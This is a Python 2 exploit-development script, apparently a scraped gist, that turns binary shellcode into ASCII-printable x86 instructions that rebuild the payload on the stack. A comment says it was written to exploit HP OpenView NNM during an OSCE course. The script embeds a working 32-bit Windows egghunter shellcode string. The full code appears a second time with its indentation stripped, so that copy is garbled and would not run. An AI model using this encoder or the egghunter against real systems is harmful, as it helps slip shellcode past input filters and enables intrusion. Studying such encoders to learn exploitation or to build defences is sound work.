mgeeky/ascii-shellcode-encoder.py

## ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
# ESP value to the EAX, then by adding to the EAX value 0x16CA then by
# setting ESP with such resulted EAX. It means that the final decoded shellcode
# will get stored in the stack, by 0x16CA bytes away from current stack address.
#
# Obviously, this encoder will not be working under DEP/W^X environments.
#
# Written for HP OpenView NNM exploitation purpose, during
# Offensive-Security CTP / OSCE course.
#
# Source:
#   https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
#
# Mariusz B. / mgeeky, '17
#

import random
import struct
import ctypes
import sys

# ================================================
#    OPTIONS
# ================================================

# Characters that are safe to use in encoded payload.
VALID_CHARS = "01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-*\\%"

# Be more verbose.
DEBUG = False

# Set it to True in order to always prepend ZERO-EAX primitive before
# sequence of SUB operations. The `gen` routine will then operate on
# previous value being always 0x00000000 instead of previously held in
# EAX value. The side effect of this setting is increased payload length.
PREPEND_ZERO_OUT = False

# ================================================

MAX_NUM = 128

primitives = {
    # Zeros-out the EAX register
    # 25 4a4f4e45   AND EAX,454e4f4a
    # 25 3530313a   AND EAX,3a313035
    #'zero-eax' : '%JONE%501:',

    # Zeros-out the EAX register
    # 25 4A4D4E55 AND EAX,554E4D4A
    # 25 3532312A AND EAX,2A313235
    'zero-eax': '%JMNU%521*',

    # Aligns a stack address that the EAX will take, by
    # adding value of 0x1688 to the EAX register
    # 2D 41373737   SUB EAX, 37373741
    # 2D 69252525   SUB EAX, 25252569
    # 2D 72324949   SUB EAX, 49493272
    # 2D 5C5A5A5A   SUB EAX, 5A5A5A5C
    'eax-stack-align' : '-A777-i%%%-r2II-\\ZZZ',

    # Sets ESP (stack pointer) to EAX
    # 50            PUSH EAX
    # 5c            POP ESP
    'set-esp-to-eax' : 'P\\',

    # Sets EAX to ESP
    # 54            PUSH ESP
    # 58            POP EAX
    'set-eax-to-esp' : 'TX',

    # ASCII friendly NOP equivalent
    # 47            INC EDI
    'nop' : 'G',

    # Stores resulted EAX value on the stack
    # 50            PUSH EAX
    'store-on-stack' : 'P',
}

class InvalidCharResulted(Exception):
    pass

def dbg(x, raw = False):
    if DEBUG:
        if raw:
            print x
        else:
            print '[dbg] ' + x

def compose(num):
    ret = 0
    ret |= num[3] << 24
    ret |= num[2] << 16
    ret |= num[1] <<  8
    ret |= num[0]
    return ret

def decompose(num):
    decompose = [0, 0, 0, 0]
    decompose[0] = (num & 0x000000ff)
    decompose[1] = (num & 0x0000ff00) >> 8
    decompose[2] = (num & 0x00ff0000) >> 16
    decompose[3] = (num & 0xff000000) >> 24
    return decompose

def strfry(item):
    return ''.join([str(w) for w in random.sample(item, len(item))])

def strfrylist(item):
    x = list(item)
    random.shuffle(x)
    return x

# Original algorithm designed by Jon Erickson, <matrix@phiral.com>
# Heavily modified by the author of this program.
def gen(dword, prev, alphabet):
    chrs_len = len(alphabet)

    t = decompose(dword)
    l = decompose(prev)

    p = [0 for i in range(MAX_NUM)]
    q = [0 for i in range(MAX_NUM)]
    r = [0 for i in range(MAX_NUM)]
    s = [0 for i in range(MAX_NUM)]

    # Initializing index tables
    for a in range(chrs_len):
        p[a] = q[a] = r[a] = s[a] = a + 1

    # Shuffling index tables
    p = strfrylist(p)
    q = strfrylist(q)
    r = strfrylist(r)
    s = strfrylist(s)

    #pr = strfrylist(list(alphabet[:20]))
    pr = [chr(0) for c in range(20)]

    # Coefficients = subsequent bytes forming a DWORDs that will be
    # used as arguments in SUB operations. coeffs[0] stands for the
    # first SUB's argument, coeffs[1] for the second SUB's argument and so on.
    coeffs = [
        [0, 0, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0]
    ]

    # 0x2D - SUB opcode. Here we construct a template:
    #   [ ..., 0x2d, AA, BB, CC, DD, ...] where AA,BB,CC,DD will be argument
    # bytes to fill in.
    pr[0] = pr[5] = pr[10] = pr[15] = chr(0x2D)

    # Construct from 1 to 5 at max consecutive SUB operations
    for a in range(1, 5):
        carry = 0
        flag = [0, 0, 0, 0]

        # Iterate over bytes 0...3 composing full 32-bit DWORD
        for z in range(4):
            loop_next = 0

            # Iterate over possible indexes of the first byte within argument
            for i in range(chrs_len):

                # Iterate over possible indexes of the second byte within argument
                for j in range(chrs_len):
                    for k in range(chrs_len):
                        for m in range(chrs_len):

                            # We get random byte from valid chars charset at currently
                            # processed positions.
                            x1 = alphabet[p[i] - 1]
                            x2 = alphabet[q[j] - 1]
                            x3 = alphabet[r[k] - 1]
                            x4 = alphabet[s[m] - 1]

                            # t[z] - Desired[z], the target byte we are looking for
                            # l[z] - Previous[z], the previous byte on this position.
                            # Desired[z] = Previous[z] - Carry - A[z] - B[z] - C[z] - D[z]
                            # Previous[z] = Desired[z] + Carry + A[z] + B[z] + C[z] + D[z]
                            tr = ctypes.c_uint32( t[z] + carry \
                                        + ord(x1) + ord(x2) \
                                        + ord(x3) + ord(x4)).value

                            # If sum result equals to our previous byte at this position -
                            # we have a hit.
                            if (tr & 0xff) == l[z]:

                                # Resulted value, in `tr` might be easily something like: 0x175
                                # then the carry will be 0x01
                                carry = (tr & 0xff00) >> 8

                                # We hit bytes forming a good looking DWORD (32 bit value), therefore
                                # we store that value for later considerations
                                if i < chrs_len:
                                    pr[ 1 + z] = x1
                                    coeffs[0][z] = ord(x1)
                                if j < chrs_len:
                                    pr[ 6 + z] = x2
                                    coeffs[1][z] = ord(x2)
                                if k < chrs_len:
                                    pr[11 + z] = x3
                                    coeffs[2][z] = ord(x3)
                                if m < chrs_len:
                                    pr[16 + z] = x4
                                    coeffs[3][z] = ord(x4)

                                dbg('try = %x, l[%d] = %x, t[%d] = %x, coeffs = %s' % \
                                    (tr, z, l[z], z, t[z], str(coeffs)))

                                loop_next = 1

                                # We mark that we have already found a good values for that `z` position.
                                flag[z] = 1

                            if a < 4 or loop_next: break
                        if a < 3 or loop_next: break
                    if a < 2 or loop_next: break

        # Have we found already all 4 byte candidates?
        if sum(flag) == 4:
            dbg('flag=%s, a=%d, z=%d, i=%d, j=%d, k=%d, m=%d' % (flag,a,z,i,j,k,m))
            break

    assert sum(flag) == 4, "Could not generate computation instructions for this dword: 0x%08x" % dword

    dbg('Coeffs before fixups = %s' % (str(coeffs)))

    # Now we need to check whether the above algorithm did not fell into local optimum
    # and didn't yielded some slightly varying values. We will retry 5 times values fixups.
    ctr = 0
    while ctr < 5:
        ctr += 1
        dbg('Fixup attempt %d: gen(0x%08x, 0x%08x, ...): "%s"' % \
            (ctr, dword, prev, ''.join(['%02x' % ord(c) for c in pr])))

        # Now we print assembler interpretation of collected coefficients
        val = prev
        dbg('\n\t\t\t\t; EAX = 0x%08x' % val, True)
        for n in coeffs:
            num = compose(n)
            val = ctypes.c_uint32(val - num).value
            dbg('\tSUB EAX, 0x%08x\t; EAX = 0x%08x' % (num, val), True)

        # oops, the resutled from substraction value is not matching desired one.
        # we will have to fixup bytes that differ and retry verification process.
        if val != dword:
            dbg('in attempt #%d values do not match: 0x%08x != 0x%08x' % (ctr,val,dword))

            valdec = decompose(ctypes.c_uint32(val).value )
            dworddec = decompose(ctypes.c_uint32(dword).value)

            # We check each of the four bytes whether they differ from desired.
            for i in range(4):
                if valdec[i] != dworddec[i]:
                    dbg('byte %d needs fixing %02x => %02x' % (i, valdec[i], dworddec[i]))

                    # Since they differ, we fixup them
                    diff = valdec[i] - dworddec[i]
                    pr[16 + i] = chr(ord(pr[16 + i]) + diff)
                    coeffs[3][i] += diff

                    # Resulted byte after applied fixup outlies our VALID_CHARS charset,
                    # we could have re-invoke the gen() routine here, but it will be easier
                    # to just quit and try again from the scratch.
                    if pr[16 + i] not in VALID_CHARS:
                        raise InvalidCharResulted(pr[16+i])

        else:
            dbg('Values match perfectly: 0x%08x == 0x%08x' % (val, dword))
            break

    if val != dword:
        print '\n[!] COMPUTATION FAILURE: 0x%08x != 0x%08x' % (val, dword)
        sys.exit(-1)

    ret = ''.join(pr)
    return ret

def process(inp, prepend_init = True):
    size = len(inp)
    pad = 4 - (size % 4)
    if pad == 4: pad = 0
    alphabet = strfry(VALID_CHARS)

    # Build up initial payload's stub
    out = ''

    if prepend_init:
        out += primitives['zero-eax']
        out += primitives['set-eax-to-esp']
        out += primitives['eax-stack-align']
        out += primitives['set-esp-to-eax']

        if not PREPEND_ZERO_OUT:
            out += primitives['zero-eax']

    buf = inp + '\x90' * pad
    assert len(buf) % 4 == 0, "Working buffer must be divisble by 4!"

    prev = 0

    # Iterate over every next four bytes grouped values (DWORDs)
    for i in range(len(buf), 0, -4):
        dword = struct.unpack('<I', buf[i-4:i])[0]
        alphabet = strfry(alphabet)
        instr = gen(dword, prev, alphabet)
        if PREPEND_ZERO_OUT:
            prev = 0
            out += primitives['zero-eax']
        else:
            prev = dword
        out += instr + primitives['store-on-stack']


    return out

def usage():
    print '''
    :: printable-shellcode.py - Utility generating a ASCII-printable shellcode
                                out of provided binary file (ASCII encoder).
        Mariusz B. / mgeeky, '17

        Algorithm based on terrific `dissembler` tool by Phiral Research Labs,
        by Jon Erickson <matrix@phiral.com>

Usage:
    printable-shellcode.py <input-file|0xValue> <output-file>

Where:
    input-file      - input file containing shellcode, '-' for stdin or 'EGG' for
                        standard T00WT00W 32-bit windows egghunter
    0xValue         - single DWORD value, prepended with 0x to encode.
    output-file     - file to store result of ASCII encoding, or '-' for stdout
'''

def display_output(out):
    print '[+] SHELLCODE ENCODED PROPERLY. Resulted length: %d bytes' % (len(out))
    print
    print '-' * 80
    print out
    print '-' * 80
    print
    print '[+] HEX FORM:'
    print ''.join(['%02x' % ord(c) for c in out])
    print
    print '[+] ESCAPED-HEX FORM:'
    print ''.join(['\\x%02x' % ord(c) for c in out])
    print
    print '[+] PYTHON COMPACT SEXY FORM:'
    buf = '\tshellcode += r"'
    for i in range(len(out)):
        if i % 20 == 0 and i > 0:
            buf += '"\n\tshellcode += r"'
        buf += out[i]
    buf += '"'
    print buf

def primitives_precheck():
    failed = False
    for k, v in primitives.items():
        for c in v:
            if c not in VALID_CHARS:
                print '[!] ERROR: Primitive "%s" contains illegal character in it: (0x%02x, "%c")' % (k, ord(c), c)
                print '[!] It means you will have to find a suitable primitive yourself and modify the `primitives` dictionary within this script.'
                print
                failed = True

    return not failed

def main():
    if len(sys.argv) != 3:
        if len(sys.argv) == 2 and sys.argv[1].startswith('0x'):
            pass
        else:
            usage()
            return False

    if not primitives_precheck():
        return False

    input_bytes = []
    prepend_init = True

    if sys.argv[1] == '-':
        input_bytes = sys.stdin.read()
    elif sys.argv[1].startswith('0x'):
        input_bytes = ''.join([chr(c) for c in decompose(int(sys.argv[1], 16))])
        prepend_init = False
    elif sys.argv[1] == 'EGG':
        input_bytes = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    else:
        with open(sys.argv[1], 'rb') as f:
            input_bytes = f.read()

    print '[*] Input buffer size: %d bytes.' % (len(input_bytes))

    i = 0
    success = False
    while i < 3:
        try:
            out = process(input_bytes, prepend_init)
            if out:
                success = True
                display_output(out)
                if len(sys.argv) > 2 and sys.argv[2] != '-':
                    with open(sys.argv[2], 'wb') as f:
                        f.write(out)
            else:
                print '[?] Returned empty payload. Confused...'

            break
        except InvalidCharResulted as pr:
            print '[!] Inter-bytes difference resulted too big rendering invalid char (%x, "%c"). Restarting...' % (ord(str(pr)), str(pr))
            continue

    if not success:
        print '[!] PROGRAM FAILURE.'

if __name__ == '__main__':
    main()
	#!/usr/bin/python
	#
	# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
	# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
	# utility (as described in: Hacking - The Art of Exploitation).
	#
	# Basically one gives to the program's output a binary encoded shellcode,
	# and it yields on the output it's ASCII encoded form.
	#
	# This payload will at the beginning align the stack by firstly moving
	# ESP value to the EAX, then by adding to the EAX value 0x16CA then by
	# setting ESP with such resulted EAX. It means that the final decoded shellcode
	# will get stored in the stack, by 0x16CA bytes away from current stack address.
	#
	# Obviously, this encoder will not be working under DEP/W^X environments.
	#
	# Written for HP OpenView NNM exploitation purpose, during
	# Offensive-Security CTP / OSCE course.
	#
	# Source:
	# https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
	#
	# Mariusz B. / mgeeky, '17
	#

	import random
	import struct
	import ctypes
	import sys

	# ================================================
	# OPTIONS
	# ================================================

	# Characters that are safe to use in encoded payload.
	VALID_CHARS = "01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-*\\%"

	# Be more verbose.
	DEBUG = False

	# Set it to True in order to always prepend ZERO-EAX primitive before
	# sequence of SUB operations. The `gen` routine will then operate on
	# previous value being always 0x00000000 instead of previously held in
	# EAX value. The side effect of this setting is increased payload length.
	PREPEND_ZERO_OUT = False

	# ================================================

	MAX_NUM = 128

	primitives = {
	# Zeros-out the EAX register
	# 25 4a4f4e45 AND EAX,454e4f4a
	# 25 3530313a AND EAX,3a313035
	#'zero-eax' : '%JONE%501:',

	# Zeros-out the EAX register
	# 25 4A4D4E55 AND EAX,554E4D4A
	# 25 3532312A AND EAX,2A313235
	'zero-eax': '%JMNU%521*',

	# Aligns a stack address that the EAX will take, by
	# adding value of 0x1688 to the EAX register
	# 2D 41373737 SUB EAX, 37373741
	# 2D 69252525 SUB EAX, 25252569
	# 2D 72324949 SUB EAX, 49493272
	# 2D 5C5A5A5A SUB EAX, 5A5A5A5C
	'eax-stack-align' : '-A777-i%%%-r2II-\\ZZZ',

	# Sets ESP (stack pointer) to EAX
	# 50 PUSH EAX
	# 5c POP ESP
	'set-esp-to-eax' : 'P\\',

	# Sets EAX to ESP
	# 54 PUSH ESP
	# 58 POP EAX
	'set-eax-to-esp' : 'TX',

	# ASCII friendly NOP equivalent
	# 47 INC EDI
	'nop' : 'G',

	# Stores resulted EAX value on the stack
	# 50 PUSH EAX
	'store-on-stack' : 'P',
	}

	class InvalidCharResulted(Exception):
	pass

	def dbg(x, raw = False):
	if DEBUG:
	if raw:
	print x
	else:
	print '[dbg] ' + x

	def compose(num):
	ret = 0
	ret \|= num[3] << 24
	ret \|= num[2] << 16
	ret \|= num[1] << 8
	ret \|= num[0]
	return ret

	def decompose(num):
	decompose = [0, 0, 0, 0]
	decompose[0] = (num & 0x000000ff)
	decompose[1] = (num & 0x0000ff00) >> 8
	decompose[2] = (num & 0x00ff0000) >> 16
	decompose[3] = (num & 0xff000000) >> 24
	return decompose

	def strfry(item):
	return ''.join([str(w) for w in random.sample(item, len(item))])

	def strfrylist(item):
	x = list(item)
	random.shuffle(x)
	return x

	# Original algorithm designed by Jon Erickson, <matrix@phiral.com>
	# Heavily modified by the author of this program.
	def gen(dword, prev, alphabet):
	chrs_len = len(alphabet)

	t = decompose(dword)
	l = decompose(prev)

	p = [0 for i in range(MAX_NUM)]
	q = [0 for i in range(MAX_NUM)]
	r = [0 for i in range(MAX_NUM)]
	s = [0 for i in range(MAX_NUM)]

	# Initializing index tables
	for a in range(chrs_len):
	p[a] = q[a] = r[a] = s[a] = a + 1

	# Shuffling index tables
	p = strfrylist(p)
	q = strfrylist(q)
	r = strfrylist(r)
	s = strfrylist(s)

	#pr = strfrylist(list(alphabet[:20]))
	pr = [chr(0) for c in range(20)]

	# Coefficients = subsequent bytes forming a DWORDs that will be
	# used as arguments in SUB operations. coeffs[0] stands for the
	# first SUB's argument, coeffs[1] for the second SUB's argument and so on.
	coeffs = [
	[0, 0, 0, 0],
	[0, 0, 0, 0],
	[0, 0, 0, 0],
	[0, 0, 0, 0]
	]

	# 0x2D - SUB opcode. Here we construct a template:
	# [ ..., 0x2d, AA, BB, CC, DD, ...] where AA,BB,CC,DD will be argument
	# bytes to fill in.
	pr[0] = pr[5] = pr[10] = pr[15] = chr(0x2D)

	# Construct from 1 to 5 at max consecutive SUB operations
	for a in range(1, 5):
	carry = 0
	flag = [0, 0, 0, 0]

	# Iterate over bytes 0...3 composing full 32-bit DWORD
	for z in range(4):
	loop_next = 0

	# Iterate over possible indexes of the first byte within argument
	for i in range(chrs_len):

	# Iterate over possible indexes of the second byte within argument
	for j in range(chrs_len):
	for k in range(chrs_len):
	for m in range(chrs_len):

	# We get random byte from valid chars charset at currently
	# processed positions.
	x1 = alphabet[p[i] - 1]
	x2 = alphabet[q[j] - 1]
	x3 = alphabet[r[k] - 1]
	x4 = alphabet[s[m] - 1]

	# t[z] - Desired[z], the target byte we are looking for
	# l[z] - Previous[z], the previous byte on this position.
	# Desired[z] = Previous[z] - Carry - A[z] - B[z] - C[z] - D[z]
	# Previous[z] = Desired[z] + Carry + A[z] + B[z] + C[z] + D[z]
	tr = ctypes.c_uint32( t[z] + carry \
	+ ord(x1) + ord(x2) \
	+ ord(x3) + ord(x4)).value

	# If sum result equals to our previous byte at this position -
	# we have a hit.
	if (tr & 0xff) == l[z]:

	# Resulted value, in `tr` might be easily something like: 0x175
	# then the carry will be 0x01
	carry = (tr & 0xff00) >> 8

	# We hit bytes forming a good looking DWORD (32 bit value), therefore
	# we store that value for later considerations
	if i < chrs_len:
	pr[ 1 + z] = x1
	coeffs[0][z] = ord(x1)
	if j < chrs_len:
	pr[ 6 + z] = x2
	coeffs[1][z] = ord(x2)
	if k < chrs_len:
	pr[11 + z] = x3
	coeffs[2][z] = ord(x3)
	if m < chrs_len:
	pr[16 + z] = x4
	coeffs[3][z] = ord(x4)

	dbg('try = %x, l[%d] = %x, t[%d] = %x, coeffs = %s' % \
	(tr, z, l[z], z, t[z], str(coeffs)))

	loop_next = 1

	# We mark that we have already found a good values for that `z` position.
	flag[z] = 1

	if a < 4 or loop_next: break
	if a < 3 or loop_next: break
	if a < 2 or loop_next: break

	# Have we found already all 4 byte candidates?
	if sum(flag) == 4:
	dbg('flag=%s, a=%d, z=%d, i=%d, j=%d, k=%d, m=%d' % (flag,a,z,i,j,k,m))
	break

	assert sum(flag) == 4, "Could not generate computation instructions for this dword: 0x%08x" % dword

	dbg('Coeffs before fixups = %s' % (str(coeffs)))

	# Now we need to check whether the above algorithm did not fell into local optimum
	# and didn't yielded some slightly varying values. We will retry 5 times values fixups.
	ctr = 0
	while ctr < 5:
	ctr += 1
	dbg('Fixup attempt %d: gen(0x%08x, 0x%08x, ...): "%s"' % \
	(ctr, dword, prev, ''.join(['%02x' % ord(c) for c in pr])))

	# Now we print assembler interpretation of collected coefficients
	val = prev
	dbg('\n\t\t\t\t; EAX = 0x%08x' % val, True)
	for n in coeffs:
	num = compose(n)
	val = ctypes.c_uint32(val - num).value
	dbg('\tSUB EAX, 0x%08x\t; EAX = 0x%08x' % (num, val), True)

	# oops, the resutled from substraction value is not matching desired one.
	# we will have to fixup bytes that differ and retry verification process.
	if val != dword:
	dbg('in attempt #%d values do not match: 0x%08x != 0x%08x' % (ctr,val,dword))

	valdec = decompose(ctypes.c_uint32(val).value )
	dworddec = decompose(ctypes.c_uint32(dword).value)

	# We check each of the four bytes whether they differ from desired.
	for i in range(4):
	if valdec[i] != dworddec[i]:
	dbg('byte %d needs fixing %02x => %02x' % (i, valdec[i], dworddec[i]))

	# Since they differ, we fixup them
	diff = valdec[i] - dworddec[i]
	pr[16 + i] = chr(ord(pr[16 + i]) + diff)
	coeffs[3][i] += diff

	# Resulted byte after applied fixup outlies our VALID_CHARS charset,
	# we could have re-invoke the gen() routine here, but it will be easier
	# to just quit and try again from the scratch.
	if pr[16 + i] not in VALID_CHARS:
	raise InvalidCharResulted(pr[16+i])

	else:
	dbg('Values match perfectly: 0x%08x == 0x%08x' % (val, dword))
	break

	if val != dword:
	print '\n[!] COMPUTATION FAILURE: 0x%08x != 0x%08x' % (val, dword)
	sys.exit(-1)

	ret = ''.join(pr)
	return ret

	def process(inp, prepend_init = True):
	size = len(inp)
	pad = 4 - (size % 4)
	if pad == 4: pad = 0
	alphabet = strfry(VALID_CHARS)

	# Build up initial payload's stub
	out = ''

	if prepend_init:
	out += primitives['zero-eax']
	out += primitives['set-eax-to-esp']
	out += primitives['eax-stack-align']
	out += primitives['set-esp-to-eax']

	if not PREPEND_ZERO_OUT:
	out += primitives['zero-eax']

	buf = inp + '\x90' * pad
	assert len(buf) % 4 == 0, "Working buffer must be divisble by 4!"

	prev = 0

	# Iterate over every next four bytes grouped values (DWORDs)
	for i in range(len(buf), 0, -4):
	dword = struct.unpack('<I', buf[i-4:i])[0]
	alphabet = strfry(alphabet)
	instr = gen(dword, prev, alphabet)
	if PREPEND_ZERO_OUT:
	prev = 0
	out += primitives['zero-eax']
	else:
	prev = dword
	out += instr + primitives['store-on-stack']


	return out

	def usage():
	print '''
	:: printable-shellcode.py - Utility generating a ASCII-printable shellcode
	out of provided binary file (ASCII encoder).
	Mariusz B. / mgeeky, '17

	Algorithm based on terrific `dissembler` tool by Phiral Research Labs,
	by Jon Erickson <matrix@phiral.com>

	Usage:
	printable-shellcode.py <input-file\|0xValue> <output-file>

	Where:
	input-file - input file containing shellcode, '-' for stdin or 'EGG' for
	standard T00WT00W 32-bit windows egghunter
	0xValue - single DWORD value, prepended with 0x to encode.
	output-file - file to store result of ASCII encoding, or '-' for stdout
	'''

	def display_output(out):
	print '[+] SHELLCODE ENCODED PROPERLY. Resulted length: %d bytes' % (len(out))
	print
	print '-' * 80
	print out
	print '-' * 80
	print
	print '[+] HEX FORM:'
	print ''.join(['%02x' % ord(c) for c in out])
	print
	print '[+] ESCAPED-HEX FORM:'
	print ''.join(['\\x%02x' % ord(c) for c in out])
	print
	print '[+] PYTHON COMPACT SEXY FORM:'
	buf = '\tshellcode += r"'
	for i in range(len(out)):
	if i % 20 == 0 and i > 0:
	buf += '"\n\tshellcode += r"'
	buf += out[i]
	buf += '"'
	print buf

	def primitives_precheck():
	failed = False
	for k, v in primitives.items():
	for c in v:
	if c not in VALID_CHARS:
	print '[!] ERROR: Primitive "%s" contains illegal character in it: (0x%02x, "%c")' % (k, ord(c), c)
	print '[!] It means you will have to find a suitable primitive yourself and modify the `primitives` dictionary within this script.'
	print
	failed = True

	return not failed

	def main():
	if len(sys.argv) != 3:
	if len(sys.argv) == 2 and sys.argv[1].startswith('0x'):
	pass
	else:
	usage()
	return False

	if not primitives_precheck():
	return False

	input_bytes = []
	prepend_init = True

	if sys.argv[1] == '-':
	input_bytes = sys.stdin.read()
	elif sys.argv[1].startswith('0x'):
	input_bytes = ''.join([chr(c) for c in decompose(int(sys.argv[1], 16))])
	prepend_init = False
	elif sys.argv[1] == 'EGG':
	input_bytes = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
	else:
	with open(sys.argv[1], 'rb') as f:
	input_bytes = f.read()

	print '[*] Input buffer size: %d bytes.' % (len(input_bytes))

	i = 0
	success = False
	while i < 3:
	try:
	out = process(input_bytes, prepend_init)
	if out:
	success = True
	display_output(out)
	if len(sys.argv) > 2 and sys.argv[2] != '-':
	with open(sys.argv[2], 'wb') as f:
	f.write(out)
	else:
	print '[?] Returned empty payload. Confused...'

	break
	except InvalidCharResulted as pr:
	print '[!] Inter-bytes difference resulted too big rendering invalid char (%x, "%c"). Restarting...' % (ord(str(pr)), str(pr))
	continue

	if not success:
	print '[!] PROGRAM FAILURE.'

	if __name__ == '__main__':
	main()